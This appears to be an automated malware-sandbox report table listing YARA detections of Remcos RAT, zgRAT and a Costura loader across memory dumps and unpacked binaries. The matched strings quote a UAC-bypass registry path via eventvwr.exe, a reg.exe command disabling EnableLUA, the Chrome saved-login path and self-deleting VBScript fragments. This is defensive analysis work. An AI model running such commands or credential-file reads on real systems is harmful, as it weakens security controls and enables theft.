0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5d4a2:$s1: file:/// 0x5d3fe:$s2: {11111-22222-10009-11112} 0x5d432:$s3: {11111-22222-50001-00000} 0x5a103:$s4: get_Module 0x5a21f:$s5: Reverse 0x5b922:$s6: BlockCopy 0x5bfa4:$s7: ReadByte 0x5d4b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5d4a2:$s1: file:/// 0x5d3fe:$s2: {11111-22222-10009-11112} 0x5d432:$s3: {11111-22222-50001-00000} 0x5a103:$s4: get_Module 0x5a21f:$s5: Reverse 0x5b922:$s6: BlockCopy 0x5bfa4:$s7: ReadByte 0x5d4b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: kyFBQxVbsg.exe PID: 6232	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: kyFBQxVbsg.exe PID: 6232	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: InstallUtil.exe PID: 6528	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Qerdo.exe PID: 6216	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Qerdo.exe PID: 6216	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Qerdo.exe PID: 5652	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Qerdo.exe PID: 5652	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: InstallUtil.exe PID: 5836	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 6304	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 97 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.0.InstallUtil.exe.400000.5.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.5.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
24.2.Qerdo.exe.5440000.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
